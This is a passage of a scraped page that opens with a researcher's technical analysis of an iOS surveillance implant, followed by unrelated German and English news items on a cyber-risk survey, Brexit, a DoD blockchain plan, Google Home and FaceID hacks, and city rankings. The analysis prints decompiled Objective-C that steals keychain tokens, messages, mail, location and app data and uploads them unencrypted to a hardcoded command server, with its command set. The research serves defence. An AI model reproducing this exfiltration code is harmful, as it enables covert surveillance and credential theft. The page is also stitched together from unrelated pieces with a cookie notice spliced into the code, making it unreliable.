The implant can also upload the user’s location in real time, up to once per minute, if the device is online. Here’s a real sample of live location data collected by the implant when I took a trip to Amsterdam with the implant running on a phone in my pocket:

The implant uploads the device’s keychain, which contains a huge number of credentials and certificates used on and by the device. For example, the SSIDs and passwords for all saved wifi access points:



The v_Data field is the plain-text password, stored as base64:

$ echo YWJjZDEyMzQ= | base64 -D

The keychain also contains the long-lived tokens used by services such as Google’s iOS Single-Sign-On to enable Google apps to access the user’s account. These will be uploaded to the attackers and can then be used to maintain access to the user’s Google account, even once the implant is no longer running. Here’s an example using the Google OAuth token stored as in the keychain being used to log in to the Gmail web interface on a separate machine:


The implant is embedded in the privilege escalation Mach-O file in the __DATA:__file section.

From our analysis of the exploits, we know that the fake kernel task port (which gives kernel memory read and write) is always destroyed at the end of the kernel exploit. The implant runs completely in userspace, albeit unsandboxed and as root with entitlements chosen by the attacker to ensure they can still access all the private data they are interested in.

Using jtool we can view the entitlements the implant has. Remember, the attackers have complete control over these as they used the kernel exploit to add the hash of the implant binary’s code signature to the kernel trust cache.

$ jtool –ent implant
<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “”>
<plist version=”1.0″>

Many system services on iOS will try to check the entitlements of clients talking to them, and only allow clients with particular entitlements to perform certain actions. This is why, even though the implant is running as root and unsandboxed, it still requires a valid entitlements blob. They’re assigning themselves three relevant entitlements:

keychain-access-groups is used to restrict access to secrets stored in the keychain; they’ve given themselves a wildcard value here. enables the use of CoreLocation without explicit user consent, as long as Location Services is enabled. allows retrieval of the device’s phone number.


The binary is compiled without optimizations and written in Objective-C. The code snippets here are mostly manually decompiled with a bit of help from hex-rays.


The implant consists of two Objective-C classes: Service and Util and a variety of helper functions.

The implant starts by creating an instance of the Service class and calling the start selector before getting a handle to the current runloop and running it.

-[Service start] {
  [self startTimer];
  [self upload];

[Service startTimer] will ensure that the Service instance’s timerHandle method is invoked every 60 seconds:

// call timer_handle every 60 seconds
-[Service startTimer] {
  timer = [NSTimer scheduledTimerWithTimeInterval:60.0
  old_timer = self->_timer;
  self->_timer = timer;
  [old_timer release]

timer_handle is the main function responsible for handling the command and control communication. Before the device goes in to the timer_handle loop however it first does an initial upload:

-[Service upload] {
  [self uploadDevice];
  [self requestLocation];
  [self requestContacts];
  [self requestCallHistory];
  [self requestMessage];
  [self requestNotes];
  [self requestApps];
  [self requestKeychain];
  [self requestRecordings];
  [self requestSmsAttachments];
  [self requestSystemMail];
  if (!self->_defaultList) {
    self->_defaultList = [Util appPriorLists];
  [self requestPriorAppData:self->_defaultList];
  [self requestPhotoData];

This performs an initial bulk upload of data from the device. Let’s take a look at how these are implemented:

-[Service uploadDevice] {
  info = [Util dictOfDeviceInfo];
  while( [self postFiles:info remove:1] == 0) {
    [NSThread sleepForTimeInterval:10.0];
    info = [Util dictOfDeviceInfo];

Note the call to NSLog is really there in the production implant. If you connect the iPhone via a lightning cable to a Mac and open you can see these log messages as the implant runs.

Here’s [Util dictOfDeviceInfo]:

+[Util dictOfDeviceInfo] {
  struct utsname name = {};
  machine_str = [NSString stringWithCString:name.machine
   // CoreTelephony private API
  device_phone_number = CTSettingCopyMyPhoneNumber();
  if (!device_phone_number) {
    device_phone_number = @””;
  net_str = @”Cellular”
  if ([self isWifi]) {
    net_str = @”Wifi”;
  dict = @{@”name”:         [[UIDevice currentDevice] name],
           @”iccid”:        [self ICCID],
           @”imei”:         [self IMEI],
           @”SerialNumber”: [self SerialNumber],
           @”PhoneNumber”:  device_phone_number,
           @”version”:      [[UIDevice currentDevice] systemVersion]],
           @”totaldisk”:    [NSNumber numberWithFloat:
                              [[self getTotalDiskSpace] stringValue]],
           @”freedisk”:     [NSNumber numberWithFloat:
                              [[self getFreeDiskSpace] stringValue]],
           @”platform”:     machine_str,
           @”net”:          net_str}
  path = [@”/tmp” stringByAppendingPathComponent:[NSUUID UUIDString]];
  [dict writeToFile:path atomically:1]
  return @{@”device.plist”: path}

Here’s the output which gets sent to the server when the implant is run on one of my test devices:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “”>
<plist version=”1.0″>
<string>Ian Beer’s iPhone</string>

This method collects a myriad of identifiers from the device:

  • the iPhone model
  • the iPhone name (“Ian’s iPhone”)
  • the ICCID of the SIM card, which uniquely identifies the SIM
  • the iPhone serial number
  • the current phone number
  • the iOS version
  • total and free disk space
  • the currently active network interface (wifi or cellular)

They build an Objective-C dictionary object containing all this information then use the NSUUID class to generate a pseudo-random, unique string. They use that string to create a new file under /tmp, for example /tmp/68753A44-4D6F-1226-9C60-0050E4C00067. They serialize the dictionary object as XML to that file and return a dictionary @{@”device.plist”: path} mapping the name “device.plist” to that path in /tmp. This rather odd design pattern of serializing everything to files in /tmp is used throughout the implant.

Let’s take a look at how that file will get off the device and up to the attacker’s server.

[Service uploadDevice] passes the returned @{@”device.plist”: path} dictionary to [Service postFiles]:

  [self postFiles:info remove:1]

-[Service postFiles:files remove:] {
  if([[files allKeys] count] == 0) {
  sem = dispatch_semaphore_create(0.0)
  base_url_str = [
    [@”http://X.X.X.X” stringByTrimmingCharactersInSet:
                         [NSCharacterSet whitespaceAndNewlineCharacterSet]]]
  full_url_str = [base_url_str stringByAppendingString:@”/upload/info”]
  url = [NSURL URLWithString:full_url_string]
  req = [NSMutableURLRequest requestWithURL:url]
  [req setHTTPMethod:@”POST”]
  [req setTimeoutInterval:120.0]
  content_type_str = [NSString stringWithFormat:
    “multipart/form-data; charset=utf-8;boundary=%@”, @”9ff7172192b7″];
  [req setValue:content_type_str forHTTPHeaderField:@”Content-Type”]
  // this is set in [Service init], it’s SerialNumber
  // from [Util SerialNumber]
  params_dict = @{@”sn”: self->_sn}
  body_data = [self buildBodyDataWithParams:params_dict AndFiles:files]
  session = [NSURLSession sharedSession]
  NSURLSessionUploadTask* task = [session uploadTaskWithRequest:req
             ^(NSData *data, NSURLResponse *response, NSError *error){
                if (error) {
                  NSLog(@”postFile %@ Error: %@”, _, _)
                } else {
                  NSLog(@”postFile success %@”);
                if (remove) {
                  // use NSFileManager to remove all the files
  [task resume];
  dispatch_semaphore_wait(sem, -1);

The IP address of the server to upload content to is hardcoded in the implant binary. This function uses that address to make an HTTP POST request, passing the contents of the files provided in the files argument as a multipart/form-data payload (with the hardcoded boundary string “9ff7172192b7” delimiting the fields in the body data.)

Let’s take a quick look at buildBodyDataWithParams:

[-Service buildBodyDataWithParams:params AndFiles:files] {
  data = [NSMutableData data]
  for (key in params) {
    str = [NSMutableString string]
    // the boundary string
    [str appendFormat:@”–%@\r\n”, “9ff7172192b7”] ;
    [str appendFormat:
      @”Content-Disposition: form-data; name=\”%@\”\r\n\r\n”, key];
    val = [params objectForKeyedSubscript:key];
    [str appendFormat:@”%@\r\n”, val];
    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:encoded]
  for (file in files) {
    str = [NSMutableString string];
    // the boundary string
    [str appendFormat:@”–%@\r\n”, “9ff7172192b7”] ;
    [str appendFormat:
      @”Content-disposition: form-data; name=\”%@\”; filename=\”%@\”\r\n”,
      file, file];
    [str appendFormat:@”Content-Type: application/octet-stream\r\n\r\n”];
    encoded = [str dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData:encoded];
    file_path = [files objectForKeyedSubscript:file];
    file_data = [NSData dataWithContentsOfFile:file_path];
    [data appendData:file_data];
    newline_encoded = [@”\r\n” dataUsingEncoding:NSUTF8StringEncoding];
    [data appendData newline_encoded] ;
  final_str = [NSString stringWithFormat:@”–%@–\r\n”, @”9ff7172192b7″];
  final_encoded = [final_str dataUsingEncoding:NSUTF8StringEncoding];
  [data appendData:final_encoded];
  return data

This is just building a typical HTTP POST request body, embedding the contents of each file as form data.

There’s something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you’re connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.

This means that not only is the end-point of the end-to-end encryption offered by messaging apps compromised; the attackers then send all the contents of the end-to-end encrypted messages in plain text over the network to their server.

The command loop

On initial run (immediately after the iPhone has been exploited) the implant performs around a dozen bulk uploads in a similar fashion before going to sleep and being woken up by the operating system every 60 seconds. Let’s look at what happens then:

NSTimer will ensure that the [Service timer_handle] method is called every 60 seconds:

-[Service timer_handle] {
  NSLog(@”timer trig”)
  [self status];
  [self cmds];

[Service status] uses the SystemConfiguration framework to determine whether the device is currently connected via WiFi or mobile data network.

[Service cmds] calls [Service remotelist]:

-[Service cmds] {
  [self remotelist];

-[Service remotelist] {
  ws_nl = [NSCharacterSet whitespaceAndNewlineCharacterSet];
  url_str = [remote_url_long stringByTrimmingCharacterInSet:ws_nl];
  NSMutableURLRequestRef url_req = [NSMutableURLRequest alloc];
  full_url_str = [url_str stringByAppendingString:@”/list”];
  NSURLRef url = [NSURL URLWithString:full_url_str];
  [url_req initWithURL:url];
  if (self->_cookies) {
    [url_req addValue:self->_cookies forHeader:@”Cookie”];
  NSURLResponse* resp;
  NSData* data = [NSURLConnection sendSynchronousRequest:url_req
  cookie = [self getCookieFromHttpresponse:resp];
  if (
Content not available.
Please allow cookies by clicking Accept on the banner
!= 0) {
    self->_cookie = cookie;
  NSLog(@”Json data %@”, [NSString initWithData:data
  err = 0;
  json = [NSJSONSerialization JSONObjectWithData:data
  data_obj = [json objectForKey:@”data”];
  NSLog(@”data Result: %@”, data_obj);
  cmds_obj = [data_obj objectForKey:@”cmds”];
  NSLog(@”cmds: %@”, cmds_obj);
  for (cmd in cmds_obj) {
    [self doCommand:cmd];

This method makes an HTTP request to the /list endpoint on the command and control server and expects to receive a JSON-encoded object in the response. It parses that object using the system JSON library (NSJSONSerialization), expecting the JSON to be in the following form:

{ “data” :
  { “cmds” :
      {“cmd”  : <COMMAND_STRING>
       “data” : <OPTIONAL_DATA_STRING>
      }, …

Each of the enclosed commands are passed in turn to [Service doCommand]:

-[Service doCommand:cmd_dict] {
  cmd_str_raw = [cmd_dict objectForKeyedSubscript:@”cmd”]
  cmd_str = [cmd_str_raw stringByTrimmingCharactersInSet:
               [NSCharacterSet whitespaceAndNewlineCharacterSet]];
  if ([cmd_str isEqualToString:@”systemmail”]) {
    [self requestSystemMail];
  } else if([cmd_str isEqualToString:@”device”]) {
    [self uploadDevice];
  } else if([cmd_str isEqualToString:@”locate”]) {
    [self requestLocation];
  } else if([cmd_str isEqualToString:@”contact”]) {
    [self requestContact];
  } else if([cmd_str isEqualToString:@”callhistory”]) {
    [self requestCallHistory];
  } else if([cmd_str isEqualToString:@”message”]) {
    [self requestMessage];
  } else if([cmd_str isEqualToString:@”notes”]) {
    [self requestNotes];
  } else if([cmd_str isEqualToString:@”applist”]) {
    [self requestApps];
  } else if([cmd_str isEqualToString:@”keychain”]) {
    [self requestKeychain];
  } else if([cmd_str isEqualToString:@”recordings”]) {
    [self requestRecordings];
  } else if([cmd_str isEqualToString:@”msgattach”]) {
    [self requestSmsAttachments];
  } else if([cmd_str isEqualToString:@”priorapps”]) {
    if (!self->_defaultList) {
      self->_defaultList = [Util appPriorLists]
    [self requestPriorAppData:self->_defaultList]
  } else if([cmd_str isEqualToString:@”photo”]) {
    [self uploadPhoto];
  } else if([cmd_str isEqualToString:@”allapp”]) {
    dispatch_async(_dispatch_main_q, ^(app)
        [self requestAllAppData:app]
  } else if([cmd_str isEqualToString:@”app”]) {
    // parameter should be an array of bundle ids
    data = [cmd_dict objectForKey:@”data”]
    if ([data count] != 0) {
      [self requestPriorAppData:data]
  } else if([cmd_str isEqualToString:@”dl”]) {
    [@”/tmp/evd.” stringByAppendingString:[[[NSUUID UUID] UUIDString] substringToIndex: 4]]
    // it doesn’t actually seem to do anything here
  } else if([cmd_str isEqualToString:@”shot”]) {
    // nop
  } else if([cmd_str isEqualToString:@”live”]) {
    // nop
  cs = [NSCharacterSet whitespaceAndNewlineCharacterSet];
  server = [@”http://X.X.X.X:1234″ stringByTrimmingCharactersInSet:cs];
  full_url_str = [server stringByAppendingString:@”/list/suc?name=”];
  url = [NSURL URLWithString:[full_url_str stringByAppendingString:cmd_str]];
  NSLog(@”s_url: %@”, url)
  req = [[NSMutableURLRequest alloc] initWithURL:url];
  if (self->_cookies) {
    [req addValue:self->_cookies forHTTPHeaderField:@”Cookie”];
  id resp;
  [NSURLConnection sendSynchronousRequest:req
                   returningResponse: &resp
                   error: nil];
  resp_cookie = [self getCookieFromHttpresponse:resp]
  if ([resp_cookie length] == 0) {
    self->_cookie = nil;
  } else {
    self->_cookie = resp_cookie;
  NSLog(@”cookies: %@”, self->_cookie)

This method takes a dictionary with a command and an optional data argument. Here’s a list of the supported commands:

systemmail  : upload email from the default
device      : upload device identifiers
               (IMEI, phone number, serial number etc)
locate      : upload location from CoreLocation
contact     : upload contacts database
callhistory : upload phone call history
message     : upload iMessage/SMSes
notes       : upload notes made in
applist     : upload a list of installed non-Apple apps
keychain    : upload passwords and certificates stored in the keychain
recordings  : upload voice memos made using the built-in voice memos app
msgattach   : upload SMS and iMessage attachments
priorapps   : upload app-container directories from hardcoded list of
                third-party apps if installed (appPriorLists)
photo       : upload photos from the camera roll
allapp      : upload container directories of all apps
app         : upload container directories of particular apps by bundle ID
dl          : unimplemented
shot        : unimplemented
live        : unimplemented

Each command is responsible for uploading its results to the server. After each command is complete a GET request is made to the /list/suc?name=X endpoint, where X is the name of the command which completed. A cookie containing the device serial number is sent along with the GET request.

The majority of these commands work by creating tar archives of fixed lists of directories based on the desired information and the version of iOS which is running. Here, for example, is the implementation of the systemmail command:

-[Service requestSystemMail] {
  maildir = [Util dirOfSystemMail]
  if ([maildir length] != 0) {
    [Util tarWithSplit:maildir
          block:^(id files) // dictionary {filename:filepath}
            while ([self postFiles:files] == 0) {
              [NSThread sleepForTimeInterval:10.0]
+[Util dirOfSystemMail] {
  return @”/private/var/mobile/Library/Mail”;

This uses the [Util tarWithSplit] method to archive the contents of the /private/var/mobile/Library/Mail folder, which contains the contents of all locally-stored email sent and received with the built-in Apple

Here’s another example of a command, locate, which uses CoreLocation to request a geolocation fix for the device. Because the implant has the entitlement set to true this will not prompt the user for permission to access their location.

-[Service requestLocation] {
  self->_locating = 1;
  if (!self->_lm) {
    lm = [[CLLocationManager alloc] init];
    [self->_lm release];
    self->_lm = lm;
    // the delegate’s locationManager:didUpdateLocations: selector
    // will be called when location information is available
    [self->_lm setDelegate:self];
    [self->_lm setDesiredAccuracy:kCLLocationAccuracyBest];
  [self->lm startUpdatingLocation];
-[Service locationManager:manager didUpdateLocations:locations] {
  [self stopUpdatingLocation];
  loc = [locations lastObject];
  if (self->_locating) {
    struct CLLocationCoordinate2D coord = [loc coordinate];
    dict = @{@”lat” : [NSNumber numberWithDouble:coord.latitude],
             @”lon” : [NSNumber numberWithDouble:coord.longitude]};
    path = [@”/tmp” stringByAppendingPathComponent[NSUUID UUIDString];
    [dict writeToFile:path atomically:1];
      fdict = @{@”gps.plist”: path};
      if([self postFiles:fdict remove:1]) {
      [NSThread sleepForTimeInterval:10.0];

Here’s the response to the location command, which can be sent up to every 60 seconds (note: I have changed the location to be the peak of the Matterhorn in Switzerland):

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “”>
<plist version=”1.0″>

App contents

Various implant commands enable the attackers to steal the container directories of third-party apps. The implant contains a hardcoded list of apps which will always have their container directories uploaded when the implant starts up. The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.

These container directories are where most iOS apps store all their data; for example, this is where end-to-end encryption apps store unencrypted copies of all sent and received messages.

Here’s the pre-populated list of bundle identifiers for third-party apps, which will always have their container directories uploaded if the apps are installed:

If the attackers were interested in other apps installed on the device they could use a combination of the applist and app commands to get a listing of all installed app ids, then upload a particular app’s container directory by id. The allapp command will upload all the container directories for all apps on the device.


The implant has access to almost all of the personal information available on the device, which it is able to upload, unencrypted, to the attacker’s server. The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.





Do Something About It? Unternehmen leiden massiv unter Hackern

Besonders Großkonzerne sind im Visier von Hackern. Die Angriffsdichte nimmt seit Jahren zu, heißt es in einer Studie.

Studie zu Cyber-Attacken

Das Internet ist ein zunehmend gefährlicher Raum. Eine Studie kommt zu dem Ergebnis, dass die Gefahren für die deutsche Wirtschaft, Gesellschaft und Politik durch Angriffe aus dem Cyber-Space weiter gestiegen sind. Viele Unternehmen berichten inzwischen von täglichen Attacken.

Die große Mehrheit der deutschen Unternehmen hat bereits schmerzhafte Erfahrungen mit Internetgefahren gesammelt. 85 Prozent aller mittleren und großen Unternehmen in Deutschland sehen sich Cyber-Angriffen ausgesetzt. Das ist das Ergebnis einer Studie des Instituts für Demoskopie Allensbach im Auftrag der Wirtschaftsprüfungsgesellschaft Deloitte. 28 Prozent der Firmen berichten demnach von täglichen Angriffen, bei weiteren 19 Prozent kommt das mindestens einmal wöchentlich vor.

Besonders häufig haben große Unternehmen mit Cyber-Attacken zu tun – Firmen mit 1000 und mehr Mitarbeitern zu 40 Prozent täglich. Die Frequenz der Angriffe hat laut Cyber Security Report im Vergleich zu den Vorjahren zugenommen. Bei rund jedem fünften Unternehmen haben solche Angriffe bereits spürbare – in einigen Fällen sogar massive – Schäden verursacht, heißt es in dem Bericht.

Neben Angriffen auf die IT-Systeme erwachsen Unternehmen auch aus den sozialen Netzwerken diverse Bedrohungen. Bei rund einem Viertel berichten Unternehmen von Versuchen, den Ruf der Firma durch gezielte Falschinformationen im Internet zu schädigen. Dennoch verfolgt nur rund die Hälfte systematisch, was in sozialen Netzwerken über ihre Organisation geäußert wird.

Fake News an der Spitze des Risiko-Rankings

Für den Bericht zu Cyber-Risiken und IT-Sicherheit befragte das Institut für Demoskopie Allensbach Hunderte von Führungskräften aus großen und mittleren Unternehmen sowie Abgeordnete des Bundestags, der Landtage und des Europaparlaments. Sowohl Abgeordnete als auch Unternehmen setzten Fake News an die Spitze ihres Risiko-Rankings. “Soziale Medien verändern das Informationsverhalten und den politischen Diskurs gravierend. Die Tragweite dieser Entwicklung wird bisher nicht annähernd erkannt. Die Besorgnis vieler Abgeordneter ist durchaus verständlich”, sagte Renate Köcher, Geschäftsführerin des Instituts für Demoskopie Allensbach.

Zugleich schätzten Unternehmen viele Gefahren höher ein als die Abgeordneten. So fürchten sich 73 Prozent der befragten Unternehmer und lediglich 58 Prozent der Politiker vor Datenbetrug im Internet. Eingriffe in die Privatsphäre von Bürgern durch vernetzte Haustechnik bewerteten 55 Prozent der Unternehmer und 43 Prozent der Politiker als wachsendes Sicherheitsrisiko.

Einig sind sich Wirtschaftsführer und Abgeordnete in der Auffassung, dass die Politik zur Bekämpfung von Cyber-Risiken in Unternehmen beitragen kann. 90 Prozent der Unternehmensvertreter waren dieser Ansicht, Politiker stimmten zu 100 Prozent zu. Da gleichzeitig lediglich neun Prozent der Manager mit staatlichen Einrichtungen im Bereich der Cyber-Sicherheit vertraut sind, empfehlen die Autoren der Studie einen stärkeren Austausch in dem Bereich.


Quelle:, mau





140.000 Deutsche direkt vom Brexit betroffen

Nach einem harten Brexit will die britische Regierung die Freizügigkeit für Neuankömmlinge aus der Europäischen Union abschaffen. Wer bereits im Land lebt, darf aber bleiben. Dafür müssen sich im Land lebenden EU-Bürger bei den Behörden registrieren. Das haben indes bislang nur rund eine Million der insgesamt mehr als 3,5 Millionen Betroffenen getan. Die Zahl der im Vereinigten Königreich lebenden Deutschen schätzt der Office for National Statistics auf 140.000. Die mit Abstand größte Einwanderer-Gruppe bilden 905.000 polnische Staatsbürger.




US Defense Department to Develop Blockchain Cybersecurity Shield

The U.S. Department of Defense (DoD) is looking to forge a blockchain cybersecurity shield.

In a report published on July 12 titled Digital Modernization Strategy, the DoD outlined several ways to advance the nation’s digital defenses. This includes the integration of cloud and quantum computing, artificial intelligence, and improved communications through distributed ledgers.

In fact, DARPA, the research wing of the Department is already experimenting with the technology “to create a more efficient, robust, and secure platform,” to secure messaging and process transactions, reports Decrypt.

Specifically, blockchain may be deployed between units and headquarters as well as intelligence officers and the Pentagon. As part of the Digital Identity Management program, the agency may also issue a digital token that authenticates an agent’s identity.

The DoD is also experimenting with the technology to facilitate the creation of an unhackable code to secure its databases.

As part of the second Cryptographic Modernization program, in effect since 2000, the Department is replacing old hardware and cryptographic systems to meet the challenges of the improved computing power of the nation’s adversaries.

Citing the trustless, transparent, and immutable attributes of blockchain the Department writes:

“Blockchain networks not only reduce the probability of compromise, but also impose significantly greater costs on an adversary to achieve it.”

The shift from “low value to high-value work” is also part of the DoDs’ Big Data Platform (BDP), which will handle petabytes of data involved in a number of cross-agency projects. The platform “provides the ability to perform aggregation, correlation, historical trending,” and may perform pattern recognition to “predict attacks.”





DEF CON 2019: Researchers Demo Hacking Google Home

Researchers show how they hacked Google Home smart speakers using the Megellan vulnerability.

LAS VEGAS – The Tencent Blade Team of researchers demonstrated several ways they have developed to hack and run remote code on Google Home smart speakers. The hacks center around what is known as a Magellan vulnerability, which can be used to exploit the massively popular SQLite database engine.

Here at a session at DEF CON on Thursday, the researchers shed light on their work “breaking” Google Home. What made the talk unique wasn’t necessarily that Google Home smart speakers could be compromised using Megellan – that was public news in Dec. 2018 – rather it was how the hack was pulled off.

On stage Tencent researchers Wenxiang Qian, YuXiang Li and HuiYu Wu laid out the evolution of their research.

The hack of Google Home first focused on hardware, similar to the researchers approach when compromising Amazon Echo, made public last year at DEF CON. In the Echo case, researchers tampered with the flash hardware chips to create the attack scenario. In the case of Google Home, it was a bit trickier because researchers couldn’t find a hardware interface for debugging and flashing – as they did with the Amazon Echo hack.

So in this instance, researchers found clues to pull off their hack by extracting the Google Home firmware, through dumping it from the device’s NAND flash.

Because of secure boot and other OTA security verification mechanisms, researchers said directly tampering with firmware was out of the question.

“We designed a new adapter to export the pins of the test socket to a larger pitch. So, we can easily connect the chip to the programmer. Finally, it is used to read the firmware through the programmer,” researchers said.

From there they looked for weaknesses to exploit. One such method included an easy way to simulate an upgrade request (TLS). Researchers also identified a potential road to a Google Home compromise via the CAST protocol, used by Google Home to cast multimedia content from one smart device to another.

“We exploited the Magellan vulnerability to compromise cast_shell (the main program of Google Home). Through cast protocol, we can trigger Google Home to visit malicious web pages to exploit the Magellan vulnerability to exploit cast_shell,” researchers told Threatpost.

Magellan, a set of three heap buffer overflow and heap data disclosure vulnerabilities in SQLite (CVE-2018-20346, CVE-2018-20505 CVE-2018-20506), affects a large number of browsers, IoT devices and smartphones that use the open source Chromium engine. As applied to Google Home, it can lead to remote code execution via weaknesses in Chrome renderer – a la the known Magellan attack technique exploiting the SQLite flaw.

The researchers also expanded the attack surface of Google Home to include one based on a malicious app. In this example, an attacker posts a malicious Cast app to an app store. Now an attacker can remotely trigger Google Home to load the malicious app in the LAN. Next, Google Home is forced to visit a malicious URL via an embedded Chrome browser- triggering the Magellan attack.

The good news is, according researchers, there are no indications that Magellan has been abused in the wild.

“We have reported all the details of the vulnerability to Google and they have fixed the vulnerability. If your product uses Chromium, please update to the official stable version 71.0.3578.80 (or above). If your product uses SQLite, please update to 3.26.0 (or latest release).”





Black Hat USA 2019: Researchers Bypass Apple FaceID Using Biometrics ‘Achilles Heel’

“X-Glasses” made by Tencent researchers to bypass FaceID biometrics detection

Researchers were able to bypass Apple’s FaceID using a pair of glasses with tape on the lenses.

LAS VEGAS – Vulnerabilities have been uncovered in the authentication process of biometrics technology that could allow bad actors to bypass various facial recognition applications – including Apple’s FaceID. But there is a catch. Doing so requires the victim to be out cold.

Researchers on Wednesday during Black Hat USA 2019 demonstrated an attack that allowed them to bypass a victim’s FaceID and log into their phone simply by putting a pair of modified glasses on their face. By merely placing tape carefully over the lenses of a pair glasses and placing them on the victim’s face the researchers demonstrated how they could bypass Apple’s FaceID in a specific scenario. The attack itself is difficult, given the bad actor would need to figure out how to put the glasses on an unconscious victim without waking them up.

To launch the attack, researchers with Tencent tapped into a feature behind biometrics called “liveness” detection, which is part of the biometric authentication process that sifts through “real” versus “fake” features on people. It works by detecting background noise, response distortion or focus blur. One such biometrics tool that utilizes liveness detection is FaceID, which is designed and utilized by Apple for the iPhone and iPad Pro.

“With the leakage of biometric data and the enhancement of AI fraud ability, liveness detection has become the Achilles’ heel of biometric authentication security as it is to verify if the biometric being captured is an actual measurement from the authorized live person who is present at the time of capture,” researchers said during the Black Hat USA 2019 session, titled “Biometric Authentication Under Threat: Liveness Detection Hacking.”

While previous attacks have focused on generating fake data to bypass biometrics, these types of audio or video attacks consist of various components – including stealing the victims’ device fingerprint, generating fake audio and video, and hardware-level inject – and involve several moving parts, Zhuo Ma, with Tencent Security, said.

Instead, researchers decided to focus on liveness detection, which allows users to unlock their phone with one glance, hoping to bypass the feature by using an actual victim’s face while they are unconscious.

“It comes with challenges, you don’t want to wake up a sleeping victim, and 3D systems are difficult to forge… you want a low cost solution with a high success rate,” said Ma.

Researchers specifically honed in on how liveness detection scans a user’s eyes. They discovered that the abstraction of the eye for liveness detection renders a black area (the eye) with a white point on it (the iris). And, they discovered that if a user is wearing glasses, the way that liveness detection scans the eyes changes.

“After our research we found weak points in FaceID… it allows users to unlock while wearing glasses… if you are wearing glasses, it won’t extract 3D information from the eye area when it recognizes the glasses.”

Putting these two factors together, researchers created a prototype of glasses – dubbed “X-glasses” – with black tape on the lenses, and white tape inside the black tape. Using this trick they were then able to unlock a victim’s mobile phone and then transfer his money through mobile payment App by placing the tape-attached glasses above the sleeping victim’s face to bypass the attention detection mechanism of both FaceID and other similar technologies.

The attack comes with obvious drawbacks – the victim must be unconscious, for one, and can’t wake up when the glasses are placed on their face. However, it does show the weaknesses behind the security and design of liveness detection and biometrics in general, researchers said.

In terms of mitigations, researchers suggested that biometrics manufacturers add identity authentication for native cameras and increase the weight of video and audio synthesis detection.

Biometrics have been at the center of attention this year as security experts wonder whether the new technology will create increased security or a new threat attack vector. It was discussed widely at Black Hat USA 2018 as well, with new vulnerabilities in voice authentication being uncovered.





Global Top 10 best cities to live and work in: 3 of those are in Germany

Gleich drei Städte in Deutschland zählen zu den Top zehn der lebenswertesten Städten der Welt. – In einem aktuellen Ranking hat das Unternehmen Kisi Metropolen weltweit nach der besten Work-Life-Balance bewertet.

Zu den Faktoren zählten sowohl

  • harte Daten wie die Arbeitslosenquote,
  • die Anzahl der wöchentlichen Arbeitsstunden,
  • die verfügbaren Urlaubstage und
  • der Zugang zum Gesundheitswesen,
  • als auch weiche Faktoren wie die Gleichberechtigung von Männern und Frauen,
  • die Toleranz gegenüber Lesben und Schwulen,
  • der Glücks-Index,
  • die Luftverschmutzung und
  • die Freizeitangebote in einer Stadt.

Das Ergebnis: Auf Platz eins landet die finnische Hauptstadt Helsinki, mit einem Top-Score von 100 Punkten. Die deutsche Großstadt München erreicht den zweiten Platz und erzielte einen Indexwert von 98,3 Punkten. Mit Hamburg (Rang 4) und Berlin (Rang 6) schafften es sogar zwei weitere deutsche Metropolen unter die Top 10 der lebenswertesten Städte weltweit.

Auf dem letzten Platz der insgesamt 40 bewerteten Städte landete Malaysias Hauptstadt Kuala Lumpur: Sie erreichte nur einen von 100 möglichen Punkten.

By continuing to use this site, you agree to the use of cookies. Please consult the Privacy Policy page for details on data use. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.